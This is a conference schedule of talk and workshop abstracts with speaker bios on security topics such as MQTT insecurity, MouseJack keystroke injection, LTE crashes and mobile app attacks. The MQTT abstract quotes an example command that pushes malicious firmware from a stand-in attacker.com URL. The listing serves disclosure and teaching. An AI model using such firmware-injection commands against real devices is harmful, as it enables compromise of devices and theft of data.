Demolabs - Table 1 - Saturday - 10:00-11:50
LAMMA (beta)
Ajit Hatti
LAMMA Framework (beta) aims to be a comprehensive suite for
Vulnerability Assessment & auditing of crypto, PKI and related implementations.
Written in Python, LAMMA an extensible framework and supports automated assessments at large scale. LAMMA has 4 different modules to cover major aspects of Crpto-Implementations
REMOTE Module : Tests a Server TLS/SSL configurations and Public Certificate. It Checks for all known vulnerabilities from CRIME, BEAST to OFF by 20. + it has unique checks like certificate timeline analysis and detection of weak modulus.
CRYPTO Module : checks the various crypto primitives right from Random Numbers, Private keys, HASHes generated by any underlying framework (like Openssl, Java KeyTool etc) for Quality, Backdooring & Sanity.
TRUST Module : checks certificates in the trust stores of TPM, Browser, Apps to find any pinned, un-trusted certificates like "SuperFish". It also looks for stolen, insecurely stored private keys to avoid spreading of MASK APT like malware.
SOURCE Module : Helps to enforce "Cryptography Review Board" recommendations of your organisation. It uncover use of weak/backdoored schemes like "Dual_EC_DRBG" in Juniper's case.
Best thing of LAMMA is, its a command line and completely Open Source tool
Ajit Hatti is a founder of "SECURITY MONX" & author of LAMMA project, an Open Source Initiative to - improve security of Crypto Implementations & - better consume Cyber Threat Intelligence, which also is his primary area of research.
Currently Ajit is Principle consultant (Cryptography & System Security) with Payatu Technologies. He has worked as a Security Researcher with Symantec, Emerson, IBM, Bluelane Technologies in past & has presented his research at BlackHat, Defcon-CnPV & Nullcon.
Ajit is also a co-founder of "null Open Security Community", a hardcore volunteer and contributor through the community efforts of Null, Nullcon, SecurityTube.net & BSidesLV. Ajit is also a Marathon Runner and Organizes "World Run By Hackers" during these conferences.
Return to Index
CPV - Bronze 2 - Friday - 14:00-15:00
Talk Title:
Lessons from the Hacking of Ashley Madison
Speaker Name, Employer or position:
Per Thorsheim - Founder at PasswordsCon
Abstract:
Ashley Madison, the dating site promoting adultery in their slogan Life is short. Have an affair. got hacked in July 2015. Millions of customers most intimate details were released in August 2015 by the hackers, after the service owners refused to close down business. As the biggest public breach of sensitive personal information ever, there are many lessons to be learned in terms of data protection, hacktivism, crisis management, media handling, and pitfalls that must be avoided. All this told from a very personal perspective, and with a background story showing the real value of good security & privacy for all.
Bio:
Per Thorsheim is the founder of PasswordsCon. Among other things he revealed Linkein were hacked in 2012, confirmed the Ashley Madison leaks in 2015, and played a role in making the major webmail providers implement RFC 3207 STARTTLS support to better protect your privacy. He does training for news reporters on digital security & privacy, source protection and reader/customer privacy.
Social media links if provided:
@thorsheim
Return to Index
DEFCON - Track Two - Sunday - 12:00-12:59
Let’s Get Physical: Network Attacks Against Physical Security Systems
Ricky ‘HeadlessZeke’ LawshaeHacker
With the rise of the Internet of Things, the line between the physical and the digital is growing ever more hazy. Devices that once only existed in the tangible world are now accessible by anyone with a network connection. Even physical security systems, a significant part of any large organization’s overall security posture, are being given network interfaces to make management and access more convenient. But that convenience also significantly increases the risk of attack, and hacks that were once thought to only exist in movies, like opening a building’s doors from a laptop or modifying a camera feed live, are now possible and even easy to pull off. In this talk, we will discuss this new attack surface and demonstrate various ways an attacker can circumvent and compromise devices such as door controllers, security cameras, and motion sensors over the network, as well as ways to protect yourself from such attacks.
Ricky ‘HeadlessZeke’ Lawshae
has spent the better part of the last decade voiding warranties and annoying vendors for both business and pleasure. He has spoken at several conferences including DEF CON , Ruxcon, Recon, and Insomnihack on a variety of topics involving network protocols and embedded devices. By day, he works as a mild-mannered security researcher for TippingPoint DVLabs. By night, he roams the streets in search of justice.
Twitter: @HeadlessZeke
Return to Index
SkyTalks - Skyview 3 - Friday - 17:00-17:59
Speakers: Buckaroo, Steve Pordon
Talk: Lie To Me LIE TO THEM; Chronicles of How to save money at the Strip Club
What does your face and body language really say about you when you are doing physical social engineering? An understanding of micro expressions, macro expressions, body language and how to use them to your advantage in physical social engineering.
Return to Index
DEFCON - Track Two - Saturday - 11:00-11:59
Light-Weight Protocol! Serious Equipment! Critical Implications!
Lucas Lundgren Senior Security Consultant, FortConsult (Part of NCC Group)
Neal Hindocha Principal Consultant, FortConsult (Part of NCC Group)
The presentation will begin by discussing the protocol (http://mqtt.org/) and results from a simple query on shodan, showing the number of servers directly available on the internet. We will then go through the protocol specifications which shows that security is more or less non-existent. We are able to directly connect to many of the servers which are open to the internet, and following protocol specifications, see what devices they are communicating with.
We will show how its possible to extract data on all subscriptions available on the server using a ruby script, which basically gives a detailed list of the devices. However, it is not only the list of devices we are getting. The data returned by our script also contains things like session tokens (for web pages), social security numbers, phone numbers, names and other sensitive data used for one purpose or another in the communication to and from the devices.
We will show how messages can be posted into the message queues and in turn received by the devices that subscribe to the various queues. This means that we are able to issue commands targeting the range of devices we have discovered, that use this protocol. We have however also discovered that this is not limited to messages and commands, if supported by the device, we can actually issue firmware updated, simply by sending something similar to "FIRMWAREUPDATEHERE:http://www.attacker.com/filename.bin".
A specific example of what we can see and do is a home automation system we discovered. We got a list of every sensor and its status. Furthermore, we got exact GPS coordinates from the mobile app used to control the home automation. So in this case, not only were we able to control the system, we even knew when the owner was away.
The talk will move on to show various implementations where webclients and SQL servers are hooked in. Much of the communication data is stored in various databases, and because we have access, we can use MQTT to attack the database and web servers.
Multiple tools have been developed by us already to support testing the protocol and fuzzing endpoints. we will show the tools used in various demos and release them at the end of the talk! These tools are currently scripts containing various protocol implementations, that can be used to target servers and extract, or inject, data. We also have a small client that implements all interesting areas of the protocol which we use for server-to-client testing.
We believe this talk is going to have a significant impact on MQTT and anyone who uses it. This is an old protocol from 1999. Its fast and reliable, but its missing security.
We also be believe this talk will trigger a discussion about light-weight IoT protocols and security, which is much needed at this point in time.
Lucas Lundgren has a vast experience in IT security, with the "bad luck" (or tendency) to annoy companies by reporting vulnerabilities in their products.
Lucas started breaking things at the age of twelve, and has reported numerous vulnerabilities in various products.
Having worked with penetration testing professionally for over 12 years, Lucas has held IT Security positions within companies such as Sony Ericsson and IOActive. He has also been part of Corelan Team before moving on to FortConsult (Part of NCC Group)
Lucas has been breaking everything from OS vendors and financials, and he has spent a considerable amount of time inside "impenetrable fortresses".
Lucas is primarily focusing on penetration testing as well as fuzzing and exploit development, no matter the platform or medium, were he also has a passion for IoT and Smart Technology.
Neal Hindocha has been working in the security industry since 1999. He began his work at Symantec, reverse engineering malware and writing signature for Symantec's antivirus products. From there, he moved on to penetration testing, and has since been a consultant for Verizon Business and Trustwave, where he helped build the mobile testing services and focused on deliveries for advanced projects.
Currently, Neal is a Principal Consultant at FortConsult (part of NCC Group), focusing on new service areas such as cloud and IoT, whilst still reversing the odd malware and delivering pentests.
Return to Index
IOT - Bronze 4 - Friday - 17:00-18:50
Live Drone RF Reverse Engineering
Marc Newlin, Bastille Networks, Security Researcher
Reverse engineering wireless protocols is not as difficult as you might think! Join us and collaborate as we reverse engineer the RF protocol used by an AirHogs drone, from start to finish. You are invited to bring your own gear and follow along, or sit back and enjoy the spectacle.
What to Expect
We will start with some basic RF fundamentals and introduce the tools we will be using.
Next, we will collect open source intelligence about the drone from Google and the FCC website.
Armed with our OSINT, a SDR, and GNU Radio, we will reverse engineer the packet format and protocol used by the drone.
Using a SDR, we will implement a transceiver capable of communicating with the drone.
Bringing it all together, we will go airborne (with a killswitch ready should the proverbial shit hit the fan).
What to Bring
If you want to get some hands on RF reverse engineering experience, we encourage you to bring a laptop running GNU Radio, your 2.4GHz capable software defined radio, and an AirHogs Fury Jump Jet!
Marc is a security researcher at Bastille Networks, where he focuses on RF/IoT threats present in enterprise environments. He has been hacking on software defined radios since 2013, when he competed as a finalist in the DARPA Spectrum Challenge. In 2011, he wrote software to reassemble shredded documents for the DARPA Shredder Challenge, finishing the competition in third place out of 9000 teams.
Matt Knight is a software engineer and security researcher with Bastille Networks, where he seeks to discover vulnerabilities in the ubiquitous wireless interfaces that connect embedded devices to the Internet of Things.
Return to Index
WOS - Skyview 6 - Sunday - 12:10-12:59
LTE and Its Collective Insecurity
Chuck McAuley, Security Researcher at Ixia Communications
Chris Moore, Engineer at Ixia Communications
The world of LTE is enshrouded in acronym soup, mystery, and technical documents that implement security by obscurity. In this talk, we will shed light on the magic that is the evolved packet core, otherwise known as the EPC. The EPC is the packet routing engine that connects the tower to the Internet. We will discuss the network communication protocols, core infrastructure elements, and basic architecture of this system. In closing, we will disclose successful crashes and kills that we have had in this network and discuss the potential for large scale communication disruption.
Chuck McAuley is a Principal Security Researcher at Ixia Communications. For the last ten years Chuck has been doing performance and security testing of inline networking devices. If it passes packets and does deep packet inspection, he's probably tested it. In his spare time he stares at Wireshark trying to decipher the tea leaves.
Chris Moore is an SE Dev Manager for a network test company. He was an SE for around a decade before this breaking, dissecting, and exposing every sort of network box under the guise of performance and security testing.
Return to Index
DEFCON - DEF CON 101 - Thursday - 10:00-10:59
Machine Duping 101: Pwning Deep Learning Systems
Clarence Chio ML Hacker
Deep learning and neural networks have gained incredible popularity in recent years. The technology has grown to be the most talked-about and least well-understood branch of machine learning. Aside from it's highly publicized victories in playing Go, numerous successful applications of deep learning in image and speech recognition has kickstarted movements to integrate it into critical fields like medical imaging and self-driving cars. In the security field, deep learning has shown good experimental results in malware/anomaly detection, APT protection, spam/phishing detection, and traffic identification. This DEF CON 101 session will guide the audience through the theory and motivations behind deep learning systems. We look at the simplest form of neural networks, then explore how variations such as convolutional neural networks and recurrent neural networks can be used to solve real problems with an unreasonable effectiveness. Then, we demonstrate that most deep learning systems are not designed with security and resiliency in mind, and can be duped by any patient attacker with a good understanding of the system. The efficacy of applications using machine learning should not only be measured with precision and recall, but also by their malleability in an adversarial setting. After diving into popular deep learning software, we show how it can be tampered with to do what you want it do, while avoiding detection by system administrators.
Besides giving a technical demonstration of deep learning and its inherent shortcomings in an adversarial setting, we will focus on tampering real systems to show weaknesses in critical systems built with it. In particular, this demo-driven session will be focused on manipulating an image recognition system built with deep learning at the core, and exploring the difficulties in attacking systems in the wild. We will introduce a tool that helps deep learning hackers generate adversarial content for arbitrary machine learning systems, which can help make models more robust. By discussing defensive measures that should be put in place to prevent the class of attacks demonstrated, we hope to address the hype behind deep learning from the context of security, and look towards a more resilient future of the technology where developers can use it safely in critical deployments.
Clarence Chio graduated with a B.S. and M.S. in Computer Science from Stanford, specializing in data mining and artificial intelligence. He currently works as a Security Research Engineer at Shape Security, building a product that protects high valued web assets from automated attacks. At Shape, he works on the data analysis systems used to tackle this problem. Clarence spoke on Machine Learning and Security at PHDays, BSides Las Vegas and NYC, Code Blue, SecTor, and Hack in Paris. He had been a community speaker with Intel, and is also the founder and organizer of the ‘Data Mining for Cyber Security’ meetup group, the largest gathering of security data scientists in the San Francisco Bay Area.
Twitter: @cchio
Return to Index
DEFCON - DEF CON 101 - Thursday - 11:00-11:59
Maelstrom - Are You Playing with a Full Deck? : Using a Newly Developed Attack Life Cycle Game to Educate, Demonstrate and Evangelize.
Shane Steiger, Esq. CISSP, Chief Endpoint Security Architect
As a defender, have you ever been asked ‘do they win?’ How about ‘what products or capabilities should I buy to even the odds?’ Mapping the functionality to a standard list of desired capabilities only gets you so far. And, many vendors require an organization to pay for a framework, or for access to a framework, to enable tactical and strategic campaigns. Wouldn’t it be great to have an open source way to pick strategies? So what do you do? Build out your own defensive campaigns based on research, taxonomies and gameification. Building the attacker’s point of view is our expertise (at a CON). We have plenty of research here to talk about that point of view. How about building out the defender’s point of view based on the attacker’s life cycle? Defenders can use this as a defensive ‘compliment’ to begin a legitimate defensive campaign. Maybe the defender could even ‘gamify’ the approach? An attacker’s approach, a defender’s approach and a progressive life cycle with a defender’s set of targets built on things we all know, love and hate: project management. I think we have a game!
Build out rules, much like real life, then bring on the attackers, bring on the defenders and play a little game to educate, demonstrate and evangelize. Watch strategies played by both attackers and defenders. Switch sides and learn to be a Purple Teamer! Digitize it and watch the game play people or even play itself; the true rise of the machine.
Wanna Play?!
Shane began his professional career with a large food manufacturer where he helped build and secure SCADA/ICS systems across 90+ food manufacturing plants in the US. From there he spent 6 years helping to develop and build the functionality of a security team for a large pharmaceutical distributor. Currently, he is the Chief Endpoint Security Architect for a Fortune 50 technology company. His interests reside in cyber resiliency techniques, internet of things, building/breaking things and muscle cars. To think, his 25+ year passion for all things geeky started with hacking the school library computer and getting detention. Shane is also a licensed attorney. Please don't hold this against him.
Return to Index
BHV - Skyview 4 - Saturday - 17:30-17:59
Speaker: NeuroTechX
@sciencelaer
@NeuroTechX
About Sydney Swaine-Simon:
Sydney Swaine-Simon was born and raised in Montreal, Canada. He has a strong passion for technology, innovation and the human mind which led to him co-founding NeurotechX, an NPO whose goal is to educate and grow the field of Neurotechnology.
About Melanie Segado:
Melanie really likes brains and computers. This is why she co-founded NeuroTechX, an NPO whose mission is to grow the global neurotechnology community. She is currently pursuing a PhD in cognitive neuroscience. Melanie spends her free time hacking on brain technology and thinking about its societal implications.
Abstract:
Brain scanning (EEG) and stimulating (TDCS) devices, which were initially used for clinical research, are now being used for a host of commercial and military applications. However, all of these applications can be DIY’d using commercially available parts.
This demo will focus on how you can implement two of the most cutting edge brain-related applications. The first is Brain Based Authentication, which is a way to use brain signals as a unique personal identifier. The second is TDCS, which is a way to modify brain function using electricity. Throughout the session we will discuss the neuroscience underlying these techniques, as well as their reliability and ethical ramifications.
Return to Index
DEFCON - DEF CON 101 - Friday - 17:00-17:59
Malware Command and Control Channels: A journey into darkness
Brad WoodbergGroup Product Manager - Emerging Threats, Proofpoint,Inc.
Much of the time and attention dedicated to modern network security focuses on detecting the contemporary vulnerabilities and exploits which power the breaches that make the headlines. With almost all of the emphasis is placed around the endless cycle of new entry points, we are often overlooking what is perhaps one of the most profoundly interesting aspects of modern network breaches; the post-exploit communication of a compromised system to the attacker—known as command and control.
Once malware has compromised an end system, the tables are turned against the attackers; we go from being on defense, to being on offense. Attackers are constantly evolving their techniques and have become incredibly creative in attempting to hide their tracks, maintain control of compromised systems, and exfiltrate sensitive data. This presentation will explore how command and control channels have evolved against traditional defenses, where they are today, future predictions on their evolution, and most importantly, how you can go on the offense to protect your organization by identifying and disrupting command and control channels in your network.
Brad Woodberg is a Group Product Manager at Proofpoint Inc, leading the Emerging Threats product line. Prior to his current role at Proofpoint, he spent six years at Juniper Networks as a layer 7 security product manager and product line engineer. Prior to Juniper he worked for a security consulting company in Ann Arbor Michigan for four years delivering a variety of network security technologies and services. He is a four-time published author of network security books through O’Reilly and Syngress. He has spoken at several security conferences including DEF CON 19, CanSecWest 2011, SEMAPHOR and other regional talks. Brad is also an active mentor to up and coming security engineers who share a similar interest and passion in all things network security.
Twitter: @bradmatic517
Return to Index
CPV - Bronze 2 - Sunday - 11:30-12:00
Talk Title:
Managing digital codesigning identities in an engineering company
Speaker Name, Employer or position:
Evgeny Sidorov, Eldar Zaitov
Abstract:
If your company develop mobile or desktop apps you probably know that in the modern world they should be digitally signed. When you try to solve a problem of code signing in big environments, you'll face a lot of difficulties: signing keys access management (especially in Continuous Integration), malware signing prevention and pitfails like SHA-1 deprecation. We successfully implemented a custom CodeSigning-As-A-Service solution capable of signing executables running on Android, iOS, Windows (usermode code, kernel drivers, installation packages etc.), Java apps and applets and solving all mentioned problems.
Bio:
Evgeny Sidorov is an Information Security Officer at the major Russian search engine company Yandex. Evgeny works in the Application Security Engineering Team and is responsible for developing and embedding various defence techniques in web and mobile applications. He finished his Master degree in applied mathematics at the Institute of Cryptography, Telecommunications and Computer Science of Moscow.
Formely a software engineer Eldar Zaitov switched to information security in 2010, made pentesting for major Russian banks and companies. Was one of the initial members of CTF team More Smoked Leet Chicken, participated in DEF CON CTF finals. In 2012 joined Application Security Engineering Team at Yandex. Presented some information security talks at ZeroNights and YaC. Eldar is a maintainer of CTFtime.org.
Social media links if provided:
Return to Index
DEFCON - DEF CON 101 - Friday - 11:00-11:59
Meet the Feds
Jonathan Mayer Chief Technologist, Enforcement Bureau, Federal Communications Commission
Lorrie Cranor Chief Technologist, Federal Trade Commission
Ed Felten Deputy United States Chief Technology Officer, White House Office of Science and Technology Policy
The federal government is increasingly addressing policy issues that intersect with technology--especially security and privacy. This session explains how the government is responding, including technology leaders from the Federal Communications Commission, the Federal Trade Commission, and the White House Office of Science and Technology. After an overview of recent policy initiatives, and an explanation of opportunities for public service, this session will consist of an extended Q&A. It's your opportunity to meet the feds and ask them anything.
Lorrie Cranor is Chief Technologist of the Federal Trade Commission. She joins the FTC from Carnegie Mellon University, where she is a Professor of Computer Science and Engineering and Public Policy, and where she directs the CyLab Usable Privacy and Security Laboratory. Lorrie was previously a researcher at AT&T Labs Research and has also taught at the Stern School of Business at New York University. She has authored over 150 research papers on online privacy and usable security, and has played a central role in establishing the usable privacy and security research community, including her founding of the Symposium on Usable Privacy and Security. She is also a co-director of Carnegie Mellon’s Privacy Engineering masters’ program. Lorrie holds a doctorate in Engineering and Policy, masters’ degrees in Computer Science, and Technology and Human Affairs, and a bachelor’s degree in Engineering and Public Policy, from Washington University in St. Louis, Missouri.
Twitter: @TechFTC
Edward W. Felten serves as Deputy Unites States Chief Technology Officer, within the White House Office of Science and Technology Policy. Ed comes to the White House from Princeton University, where he is the Robert E. Kahn Professor of Computer Science and Public Affairs and the founding Director of the Center for Information Technology Policy. Before rejoining the Princeton faculty, Ed served as the first Chief Technologist at the U.S. Federal Trade Commission, and worked with the U.S. Department of Justice Antitrust Division. Ed has published more than 100 papers and two books on technology law and policy. Ed is a member of the National Academy of Engineering and the American Academy of Arts and Sciences, and is a Fellow at the Association for Computing Machinery. He earned his bachelor’s degree in Physics with Honors from the California Institute of Technology and his master’s and doctoral degrees in Computer Science and Engineering from the University of Washington.
Twitter: @EdFelten44
Jonathan Mayer is Chief Technologist for the Federal Communications Commission Enforcement Bureau. His responsibilities include cybersecurity, consumer privacy, and network neutrality matters. Jonathan is also a Cybersecurity Fellow at Stanford University, where he is completing a PhD in Computer Science. He previously graduated from Stanford Law School, where he served as a lecturer on technology security, privacy, and surveillance. He received his undergraduate degree from the Woodrow Wilson School of Public and International Affairs at Princeton University. Jonathan was named to the Forbes "30 Under 30" in 2014, for his contributions to technology security and privacy.
Return to Index
BHV - Skyview 4 - Saturday - 11:30-11:59
Speaker: Louis Auguste
About Louis:
Lou Auguste is an entrepreneur in residence at the NYU Tandon incubator, Future Labs. He is passionate about microscopes, global health and creating jobs. His company Alexapath is at the forefront of AI based diagnostics and have collected awards from the ASME, Qualcomm, Singularity U, the Indian government, the British government and the US government.
Abstract:
Why can't microscopes diagnose disease? What if they could? For the past four years our team from NYU Tandon School of Engineering has been building an IoT system capable of turning a standard microscope into a digital imaging tool. And the goal is to connect every laboratory in the world into a global network.
We call our device the Auto Diagnostic Assistant, or ADA, in honor of Ada Lovelace, who likely died from undiagnosed cervical cancer. We think the biohacking village will enjoy learning about ADA because it is an extremely low cost microscope accessory capable of accomplishing the same tasks that were previously only able to be accomplished with whole slide imaging devices. Perfect for biohackers looking to save, share, study and analyse images of specimens from their microscope.
Our team is comprised of hardware engineers, software devs and machine learning computer scientists and our mission is to make diagnosis faster and easier. We have validated the accuracy of our mWSIs (mobile Whole Slide Images) with a pre-clinical study and presented our research as a poster at USCAP (United States and Canada Anatomical Pathology Conference). Additionally we published our original methods for creation of digital slides in the British Medical Journal (though the secret sauce has changed since then.)
The hardware prototype of ADA won an award for best hardware led social innovation from the ASME in 2015. Currently, we are launching our beta trial in India with the support of the US Department of State and the Indian Department of Science and Technology. We are actively looking for beta testers in the US as well and would be happy to provide one unit for free to a visitor or member of the biohacking village.
Return to Index
BHV - Skyview 4 - Saturday - 11:30-11:59
Speaker: Louis Auguste
About Louis:
Lou Auguste is an entrepreneur in residence at the NYU Tandon incubator, Future Labs. He is passionate about microscopes, global health and creating jobs. His company Alexapath is at the forefront of AI based diagnostics and have collected awards from the ASME, Qualcomm, Singularity U, the Indian government, the British government and the US government.
Abstract:
Why can't microscopes diagnose disease? What if they could? For the past four years our team from NYU Tandon School of Engineering has been building an IoT system capable of turning a standard microscope into a digital imaging tool. And the goal is to connect every laboratory in the world into a global network.
We call our device the Auto Diagnostic Assistant, or ADA, in honor of Ada Lovelace, who likely died from undiagnosed cervical cancer. We think the biohacking village will enjoy learning about ADA because it is an extremely low cost microscope accessory capable of accomplishing the same tasks that were previously only able to be accomplished with whole slide imaging devices. Perfect for biohackers looking to save, share, study and analyse images of specimens from their microscope.
Our team is comprised of hardware engineers, software devs and machine learning computer scientists and our mission is to make diagnosis faster and easier. We have validated the accuracy of our mWSIs (mobile Whole Slide Images) with a pre-clinical study and presented our research as a poster at USCAP (United States and Canada Anatomical Pathology Conference). Additionally we published our original methods for creation of digital slides in the British Medical Journal (though the secret sauce has changed since then.)
The hardware prototype of ADA won an award for best hardware led social innovation from the ASME in 2015. Currently, we are launching our beta trial in India with the support of the US Department of State and the Indian Department of Science and Technology. We are actively looking for beta testers in the US as well and would be happy to provide one unit for free to a visitor or member of the biohacking village.
Return to Index
BHV - Skyview 4 - Sunday - 11:30-11:59
Speaker: Ken Belva
About Ken Belva:
Kenneth F. Belva has had a distinguished career in cyber security for almost 20 years. His many roles have included managing a financial services cyber security program audited by the State and Fed, finding 0-days in major software, getting a US Patent on automated XSS exploitation techniques, as well as frequently speaking at many cyber security groups in NYC. He can be found on LinkedIn and on twitter at @infosecmaverick
Abstract:
PACS (picture archiving and communication system) is used in health care to store, retrieval, manage, distribute and present medical images. Such images are classified as PII as they are confidential patient data, usually x-rays along with a physician's patient notes. This talk will illustrate vulnerabilities in a PACS system. Note: potential surprises.
Return to Index
BHV - Skyview 4 - Sunday - 11:30-11:59
Speaker: Ken Belva
About Ken Belva:
Kenneth F. Belva has had a distinguished career in cyber security for almost 20 years. His many roles have included managing a financial services cyber security program audited by the State and Fed, finding 0-days in major software, getting a US Patent on automated XSS exploitation techniques, as well as frequently speaking at many cyber security groups in NYC. He can be found on LinkedIn and on twitter at @infosecmaverick
Abstract:
PACS (picture archiving and communication system) is used in health care to store, retrieval, manage, distribute and present medical images. Such images are classified as PII as they are confidential patient data, usually x-rays along with a physician's patient notes. This talk will illustrate vulnerabilities in a PACS system. Note: potential surprises.
Return to Index
Demolabs - Table 4 - Saturday - 10:00-11:50
minimega
David Fritz
John Floren
minimega is a tool for setting up large networks of virtual
machines. It simplifies the process of specifying & launching VMs,
connecting them to networks, and managing the virtual machines as your
experiment progresses. Emulate a full corporate network complete with
Windows infrastructure, or replicate a portion of the Internet,
including the backbone itself. minimega is faster and easier than
OpenStack and requires essentially no configuration to set up. It can
even self-deploy itself across a cluster to expand your experiment.
David Fritz and John Floren are researchers at Sandia
National Laboratories. Their work in Emulytics focuses on new ways to
emulate real-world computing environments in controlled ways for
experiments in cyber security.
Return to Index
WOS - Skyview 6 - Saturday - 17:10-17:59
Mining VirusTotal for Operational Data and Applying a Quality Control On It
Gita Ziabari, Senior Threat Research Engineer at Fidelis Cybersecurity
More than one million samples are being submitted and analyzed by more than 50 AV engines in VirusTotal on daily basis. Factors such as filtering, scaling the detected engines, scaling the categories in network data, scaling the HTTP responses are being used in conjunction of an algorithm for constructing an operational data. The filtered data are being clustered based on their malware type with indication of their malware names. The obtained data is also being evaluated by another algorithm for removing the aged and less scaled data on daily basis. The used APIs, algorithms and source code will be presented to the audiences. The tool could be downloaded for immediate use.
Gita Ziabari (Twitter: @gitaziabri) is working at Fidelis Cybersecurity as a Senior Threat Research Engineer. She has more than 12 years of experience in threat research, networking, testing and building automated frameworks.
Return to Index
Workshops - Las Vegas Ballroom 1 - Friday - 10:00-14:00
Mobile App Attack : Taming the evil app!
Sneha Rajguru Security Consultant, Payatu Technologies Pvt.Ltd.
This full-fledged hands-on workshop will get the attendees familiar with the various Android as well as iOS application analysis techniques and bypassing the existing security models in both the platforms. The main objective of this workshop is to provide a proper guide on how the mobile applications can be attacked and provide an overview of how some of the most important security checks for the applications are applied and get an in-depth understanding of these security checks. The workshop will also include a CTF challenge designed by the trainer in the end where the attendees will use their skills learnt during the workshop to solve this challenge.
This workshop will mainly focus on the following :
- Reverse engineer Dex code for security analysis.
- Jailbreaking/Rooting of the device and also various techniques to detect Jailbreak/Root.3. Runtime analysis of the apps by active debugging.
- Modifying parts of the code, where any part can be specified as some functions, classes and to perform this check or to identify the modification, we will learn how to find and calculate the checksum of the code. Our objective in this section will be to learn, Reverse Engineering an application, get its executable binaries , modify these binaries accordingly, resign the application.
- Runtime modification of code. Objective is to learn how the programs/codes can be changed or modified at runtime. we will learn how to perform introspection or overriding the default behavior of the methods during runtime and then we will learn how to identify if the methods have been changed). For iOS we can make use of tool Cycript, snoop-it etc.
- Hooking an application and learn to perform program/code modification.
- By the end of workshop, based on the course content CTF challenges written by the trainer will be launched, where the attendees will use their skills learnt in the workshop to solve the CTF challenges.
The workshop will begin with a quick understanding on the architecture, file system,permissions and security model of both iOS and Android platform.
Sneha works as a Security Consultant with Payatu Technologies Pvt.Ltd. and holds C.E.H and E.C.S.A certifications. Her area of interest lies in Web application and mobile application security and fuzzing. She has discovered various serious application flaws within open source applications such as PDFLite.Jobberbase, Lucidchart and more. She is also an active member of Null – The open security community in India, and a contributor to regular meetups at the Pune chapter. She has spoken and provided training at GNUnify, FUDCon, Defcamp #6 and Nullcon 2016.
Max Class Size: 25
Prerequisites for students: The participants are expected to have a basic knowledge of Mobile Operating Systems. Knowledge of programming languages (Java and C, and Python for scripting) will be an added advantage to grasp things quickly.
Materials or Equipment students will need to bring to participate: Students will need the following:
- Laptop with a minimum 4GB RAM and more than 20 GB Free Hard Disk Space
- Android device ( >=2.3) or iPhone/iPad (preferable Rooted/Jailbreak)
Laptops will need to meet the following software requirements:
- Windows 7/8, Mac OS X 10.5, or *Nix
- Administrative privileges on your machines
- Virtualbox or VMPlayer
- SSH Client
- Xcode 6 or higher
- ADB
- Android Studio 1.3 or higher
- Android SDK
Return to Index
DEFCON - DEF CON 101 - Sunday - 13:00-13:59
Mouse Jiggler Offense and Defense
Dr. PhilProfessor, Bloomsburg University of Pennsylvania
A group of highly-armed individuals has just stormed into your office. They are looking to pull data from your computers which are protected with full disk encryption. In order to prevent your screen saver from activating they will likely immediately insert a mouse jiggler to prevent your screensaver lock from activating. This talk will present ways of detecting and defending against such assaults on your system by mouse jiggler wielding individuals. It will also show you how to build your own simple mouse jiggler. Nothing beyond basic Linux usage is required to understand this talk. Attendees will leave with several ways to defend against mouse jigglers and the knowledge of how to create their own mouse jigglers.
Phil was born at an early age. He cleaned out his savings as a boy in order to buy a TI99-4A computer for the sum of $450. Two years later he learned 6502 assembly and has been hacking computers and electronics ever since.
Dr. Phil currently works as a professor at Bloomsburg University of Pennsylvania. His research focus over the last few years has been on the use of microcontrollers and small embedded computers for forensics and pentesting. Phil has developed a custom pentesting Linux distro and related hardware to allow an inexpensive army of remote pentesting drones to be built using the BeagleBone Black computer boards. This work is described in detail in Phil's book "Hacking and Penetration Testing With Low Power Devices" (Syngress, 2015). Phil has also published books on Linux Forensics (Pentester Academy, 2015), USB Forensics (Pentester Academy, 2016), and Windows Forensics (Pentester Academy, 2016).
Prior to entering academia, Phil held several high level positions at well-known US companies. He holds a couple of the usual certs one might expect for someone in his position. When not working, he likes to spend time with his family, fly, hack electronics (find his Daddy and Daughter Electronics show on YouTube), and has been known to build airplanes.
Return to Index
DEFCON - Track Two - Saturday - 13:00-13:59
MouseJack: Injecting Keystrokes into Wireless Mice
Marc Newlin Security Researcher, Bastille Networks
What if your wireless mouse was an effective attack vector? Research reveals this to be the case for mice from Logitech, Microsoft, Dell, Lenovo, Hewlett-Packard, Gigabyte, and Amazon. Dubbed 'MouseJack', this class of security vulnerabilities allows keystroke injection into non-Bluetooth wireless mice. Imagine you are catching up on some work at the airport, and you reach into your laptop bag to pull out your phone charger. As you glance back at your screen, you see the tail end of an ASCII art progress bar followed by your shell history getting cleared.
Before you realize what has happened, an attacker has already installed malware on your laptop. Or maybe they just exfiltrated a git repository and your SSH keys. In the time it took you to plug in your phone, you got MouseJacked. The attacker is camped out at the other end of the terminal, equipped with a commodity USB radio dongle and a directional patch antenna hidden in a backpack, and boards her plane as soon as the deed is done. The reality of MouseJack is that an attacker can inject keystrokes into your wireless mouse dongle from over 200 meters away, at a rate of up to 7500 keystrokes per minute (one every 8ms).
Most wireless keyboards encrypt the data going between the keyboard and computer in order to deter sniffing, but wireless mouse traffic is generally unencrypted. The result is that wireless mice and keyboards ship with USB dongles that can support both encrypted and unencrypted RF packets. A series of implementation flaws makes it possible for an attacker to inject keystrokes directly into a victim's USB dongle using easily accessible, cheap hardware, in most cases only requiring that the user has a wireless mouse. The majority of affected USB dongles are unpatchable, making it likely that vulnerable computers will be common in the wild for the foreseeable future.
This talk will explain the research process that lead to the discovery of these vulnerabilities, covering specific tools and techniques. Results of the research will be detailed, including protocol behavior, packet formats, and technical specifics of each vulnerability. Additional vulnerabilities affecting 14 vendors are currently in disclosure, and will be revealed during this talk.
Marc is a security researcher and software engineer at Bastille Networks, where he focuses on RF/IoT threats present in enterprise environments. He has been hacking on software defined radios since 2013, when he competed as a finalist in the DARPA Spectrum Challenge. In 2011, he wrote software to reassemble shredded documents for the DARPA Shredder Challenge, finishing the competition in third place out of 9000 teams.
Twitter: @marcnewlin
Return to Index
DEFCON - Track Three - Friday - 16:30-16:59
MR. ROBOT Panel
Kor Adana Writer & Technical Supervisor, MR. ROBOT
Dark Tangent Founder, DEF CON
Marc Rogers
Ryan Kazanciyan Chief Security Architect, Tanium
Andre McGregor Director of Security, Tanium
Kim Zetter Senior Staff Reporter, Wired
MR. ROBOT is a rare treat - a network television show whose hacker protagonist is a fully realized character with a realistically attainable set of skills. No hyper-typing, no gibberish masquerading as tech jargon, no McGuffins to magically paper over plot holes with hacker dust. MR. ROBOT takes the tech as seriously as the drama.
